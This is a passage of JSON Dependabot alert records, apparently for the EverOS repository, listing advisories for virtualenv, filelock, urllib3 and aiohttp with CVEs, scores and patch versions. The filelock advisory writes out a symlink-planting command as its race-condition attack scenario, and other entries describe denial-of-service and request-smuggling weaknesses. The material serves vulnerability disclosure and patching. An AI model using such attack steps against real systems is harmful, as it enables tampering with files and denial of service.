CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (TOCTOU)\n- CWE-59: Improper Link Resolution Before File Access","severity":"medium","identifiers":[{"value":"GHSA-597g-3phw-6986","type":"GHSA"},{"value":"CVE-2026-22702","type":"CVE"}],"references":[{"url":"https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22702"},{"url":"https://github.com/pypa/virtualenv/pull/3013"},{"url":"https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc"},{"url":"https://github.com/advisories/GHSA-597g-3phw-6986"}],"published_at":"2026-01-13T18:45:57Z","updated_at":"2026-01-13T18:45:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"virtualenv"},"severity":"medium","vulnerable_version_range":"< 20.36.1","first_patched_version":{"identifier":"20.36.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","score":4.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00016,"percentile":0.03803},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","score":4.5},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"virtualenv"},"severity":"medium","vulnerable_version_range":"< 20.36.1","first_patched_version":{"identifier":"20.36.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/80","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/80","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":79,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"filelock"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-qmgc-5h2g-mvrw","cve_id":"CVE-2026-22701","summary":"filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock","description":"## Vulnerability Summary\n\n**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock\n\n**Affected Component:** `filelock` package - `SoftFileLock` class\n**File:** `src/filelock/_soft.py` lines 17-27\n**CWE:** CWE-362, CWE-367, CWE-59\n\n---\n\n## Description\n\nA TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly.\n\nThe vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service.\n\n### Attack Scenario\n\n```\n1. Lock attempts to acquire on /tmp/app.lock\n2. Permission validation passes\n3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock\n4. os.open() tries to create lock file\n5. Lock operates on attacker-controlled target file or fails\n```\n\n---\n\n## Impact\n\n_What kind of vulnerability is it? Who is impacted?_\n\nThis is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization.\n\n**Affected Users:**\n- Applications using `filelock.SoftFileLock` directly\n- Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy)\n\n**Consequences:**\n- **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed\n- **Denial of Service** - attacker can prevent lock file creation by maintaining symlink\n- **Resource serialization failures** - multiple processes may acquire \"locks\" simultaneously\n- **Unintended file operations** - lock could operate on attacker-controlled files\n\n**CVSS v4.0 Score:** 5.6 (Medium)\n**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N\n\n**Attack Requirements:**\n- Local filesystem access to the directory containing lock files\n- Permission to create symlinks (standard for regular unprivileged users on Unix/Linux)\n- Ability to time the symlink creation during the narrow race window\n\n---\n\n## Patches\n\n_Has the problem been patched? What versions should users upgrade to?_\n\nYes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation.\n\n**Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0)\n\n**Mitigation Details:**\n- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support\n- On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented\n- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented\n\n**Users should:**\n- Upgrade to the patched version when available\n- For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock`\n\n---\n\n## Workarounds\n\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nFor users unable to update immediately:\n\n1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146)\n\n2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories:\n ```bash\n chmod 700 /path/to/lock/directory\n ```\n\n3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation\n\n4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations\n\n---\n\n## References\n\n_Are there any links users can visit to find out more?_\n\n- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock)\n- **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html\n- **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html\n- **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html\n- **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html\n- **GitHub Repository:** https://github.com/tox-dev/filelock\n\n---\n\n**Reported by:** George Tsigourakos (@tsigouris007)","severity":"medium","identifiers":[{"value":"GHSA-qmgc-5h2g-mvrw","type":"GHSA"},{"value":"CVE-2026-22701","type":"CVE"}],"references":[{"url":"https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22701"},{"url":"https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0"},{"url":"https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5"},{"url":"https://github.com/advisories/GHSA-qmgc-5h2g-mvrw"}],"published_at":"2026-01-13T18:44:55Z","updated_at":"2026-01-13T18:44:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.3","first_patched_version":{"identifier":"3.20.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":6.0e-05,"percentile":0.00422},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H","score":5.3},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"},{"cwe_id":"CWE-367","name":"Time-of-check Time-of-use (TOCTOU) Race Condition"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.3","first_patched_version":{"identifier":"3.20.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/79","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/79","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":78,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-38jv-5279-wg99","cve_id":"CVE-2026-21441","summary":"Decompression-bomb safeguards bypassed when following HTTP redirects (streaming API)","description":"### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409).\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`.\n\nIf upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source.","severity":"high","identifiers":[{"value":"GHSA-38jv-5279-wg99","type":"GHSA"},{"value":"CVE-2026-21441","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99"},{"url":"https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-21441"},{"url":"https://lists.debian.org/debian-lts-announce/2026/01/msg00017.html"},{"url":"https://github.com/advisories/GHSA-38jv-5279-wg99"}],"published_at":"2026-01-07T19:18:14Z","updated_at":"2026-01-23T16:05:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.22, < 2.6.3","first_patched_version":{"identifier":"2.6.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00032,"percentile":0.0921},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.22, < 2.6.3","first_patched_version":{"identifier":"2.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/78","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/78","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":77,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-fh55-r93g-j68g","cve_id":"CVE-2025-69230","summary":"AIOHTTP Vulnerable to Cookie Parser Warning Storm","description":"### Summary\nReading multiple invalid cookies can lead to a logging storm.\n\n### Impact\nIf the ``cookies`` attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header.\n\n----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326","severity":"low","identifiers":[{"value":"GHSA-fh55-r93g-j68g","type":"GHSA"},{"value":"CVE-2025-69230","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g"},{"url":"https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69230"},{"url":"https://github.com/advisories/GHSA-fh55-r93g-j68g"}],"published_at":"2026-01-05T23:13:46Z","updated_at":"2026-01-06T16:07:05Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00015,"percentile":0.03409},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-779","name":"Logging of Excessive Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/77","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/77","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":76,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-g84x-mcqj-x9qq","cve_id":"CVE-2025-69229","summary":"AIOHTTP vulnerable to DoS through chunked messages","description":"### Summary\n\nHandling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks.\n\n### Impact\n\nIf an application makes use of the `request.read()` method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712\nPatch: https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229","severity":"medium","identifiers":[{"value":"GHSA-g84x-mcqj-x9qq","type":"GHSA"},{"value":"CVE-2025-69229","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq"},{"url":"https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229"},{"url":"https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69229"},{"url":"https://github.com/advisories/GHSA-g84x-mcqj-x9qq"}],"published_at":"2026-01-05T23:13:29Z","updated_at":"2026-01-06T16:07:01Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00067,"percentile":0.20533},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/76","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/76","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":75,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6jhg-hg63-jvvf","cve_id":"CVE-2025-69228","summary":"AIOHTTP vulnerable to denial of service through large payloads","description":"### Summary\nA request can be crafted in such a way that an aiohttp server's memory fills up uncontrollably during processing.\n\n### Impact\nIf an application includes a handler that uses the `Request.post()` method, an attacker may be able to freeze the server by exhausting the memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60","severity":"medium","identifiers":[{"value":"GHSA-6jhg-hg63-jvvf","type":"GHSA"},{"value":"CVE-2025-69228","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf"},{"url":"https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69228"},{"url":"https://github.com/advisories/GHSA-6jhg-hg63-jvvf"}],"published_at":"2026-01-05T23:13:14Z","updated_at":"2026-01-08T12:17:13Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/75","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/75","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":74,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-jj3x-wxrx-4x23","cve_id":"CVE-2025-69227","summary":"AIOHTTP vulnerable to DoS when bypassing asserts","description":"### Summary\nWhen assert statements are bypassed, an infinite loop can occur, resulting in a DoS attack when processing a POST body.\n\n### Impact\nIf optimisations are enabled (`-O` or `PYTHONOPTIMIZE=1`), and the application includes a handler that uses the `Request.post()` method, then an attacker may be able to execute a DoS attack with a specially crafted message.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259","severity":"medium","identifiers":[{"value":"GHSA-jj3x-wxrx-4x23","type":"GHSA"},{"value":"CVE-2025-69227","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23"},{"url":"https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69227"},{"url":"https://github.com/advisories/GHSA-jj3x-wxrx-4x23"}],"published_at":"2026-01-05T23:10:15Z","updated_at":"2026-01-06T16:06:51Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-835","name":"Loop with Unreachable Exit Condition ('Infinite Loop')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/74","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/74","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":73,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-54jq-c3m8-4m76","cve_id":"CVE-2025-69226","summary":"AIOHTTP vulnerable to brute-force leak of internal static file path components","description":"### Summary\nPath normalization for static files prevents path traversal, but opens up the ability for an attacker to ascertain the\nexistence of absolute path components.\n\n### Impact\nIf an application uses `web.static()` (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e","severity":"low","identifiers":[{"value":"GHSA-54jq-c3m8-4m76","type":"GHSA"},{"value":"CVE-2025-69226","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76"},{"url":"https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69226"},{"url":"https://github.com/advisories/GHSA-54jq-c3m8-4m76"}],"published_at":"2026-01-05T23:09:51Z","updated_at":"2026-01-06T16:06:50Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.0007,"percentile":0.2125},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"},{"cwe_id":"CWE-202","name":"Exposure of Sensitive Information Through Data Queries"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/73","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/73","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":72,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mqqc-3gqh-h2x8","cve_id":"CVE-2025-69225","summary":"AIOHTTP has unicode match groups in regexes for ASCII protocol elements","description":"### Summary\n\nThe parser allows non-ASCII decimals to be present in the Range header.\n\n### Impact\n\nThere is no known impact, but there is the possibility that there's a method to exploit a request smuggling vulnerability.\n\n----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96","severity":"low","identifiers":[{"value":"GHSA-mqqc-3gqh-h2x8","type":"GHSA"},{"value":"CVE-2025-69225","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mqqc-3gqh-h2x8"},{"url":"https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69225"},{"url":"https://github.com/advisories/GHSA-mqqc-3gqh-h2x8"}],"published_at":"2026-01-05T23:09:30Z","updated_at":"2026-01-06T16:06:45Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00056,"percentile":0.17169},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/72","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/72","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":71,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-69f9-5gxw-wvc2","cve_id":"CVE-2025-69224","summary":"AIOHTTP's unicode processing of header values could cause parsing discrepancies","description":"### Summary\nThe Python HTTP parser may allow a request smuggling attack with the presence of non-ASCII characters.\n\n### Impact\nIf a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0","severity":"low","identifiers":[{"value":"GHSA-69f9-5gxw-wvc2","type":"GHSA"},{"value":"CVE-2025-69224","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-69f9-5gxw-wvc2"},{"url":"https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69224"},{"url":"https://github.com/advisories/GHSA-69f9-5gxw-wvc2"}],"published_at":"2026-01-05T22:58:57Z","updated_at":"2026-01-06T16:06:41Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00053,"percentile":0.16392},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/71","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/71","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":70,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6mq8-rvhq-8wgg","cve_id":"CVE-2025-69223","summary":"AIOHTTP's HTTP Parser auto_decompress feature is vulnerable to zip bomb","description":"### Summary\nA zip bomb can be used to execute a DoS against the aiohttp server.\n\n### Impact\nAn attacker may be able to send a compressed request that when decompressed by aiohttp could exhaust the host's memory.\n\n------\n\nPatch: 